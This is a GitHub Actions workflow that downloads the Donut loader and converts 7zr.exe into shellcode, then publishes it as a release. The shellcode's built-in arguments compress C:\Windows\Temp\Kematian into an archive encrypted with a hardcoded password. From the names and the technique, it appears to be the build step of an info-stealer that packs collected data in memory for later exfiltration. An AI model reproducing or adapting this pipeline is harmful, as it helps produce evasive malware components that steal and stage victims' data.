name: Build 7zr Tool

on:
  push:
    branches: [main]
    paths:
      - 'frontend-src/**'

jobs:
  build:
    strategy:
      matrix:
        configuration: [Release]

    runs-on: windows-latest
    permissions:
      contents: write
      pull-requests: write
      repository-projects: write
    
    steps:
    - name: Checkout Repository
      uses: actions/checkout@v3

    - name: Delete Tag and Release
      uses: dev-drprasad/delete-tag-and-release@v1.1
      with:
        tag_name: 7zrBuild
        delete_release: true
        github_token: ${{ secrets.GITHUB_TOKEN }}

    - name: Create Release
      id: create_release
      uses: actions/create-release@v1
      env:
        GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
      with:
        tag_name: 7zrBuild
        release_name: 7zrBuild
        body: "Release created by GitHub Actions"
        draft: false
        prerelease: false

    - name: Download Donut
      run: Invoke-WebRequest -Uri https://github.com/TheWover/donut/releases/download/v1.0/donut_v1.0.zip -OutFile donut.zip

    - name: Extract Donut
      run: Expand-Archive -Path donut.zip -DestinationPath donut

    - name: Convert 7zr to Shellcode with Encryption Key 
      run: |
        Write-Host "Using a static encryption key" 
        $aeskey = "ip1j5zFgal2nd2y0TDUU7Q=="
        Write-Host "Decryption KEY: $aeskey" 
        $arguments = "a -t7z -mx=9 -mhe=on Kematian.7z C:\Windows\Temp\Kematian -p$aeskey"
        .\donut\donut.exe -i frontend-src\7zr.exe -x2 -a2 -p $arguments -o 7zr.bin -z 4

    - name: Upload Release Asset
      id: upload-release-asset
      uses: actions/upload-release-asset@v1
      env:
        GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
      with:
        upload_url: ${{ steps.create_release.outputs.upload_url }}
        asset_path: 7zr.bin
        asset_name: 7zr.bin
        asset_content_type: application/zip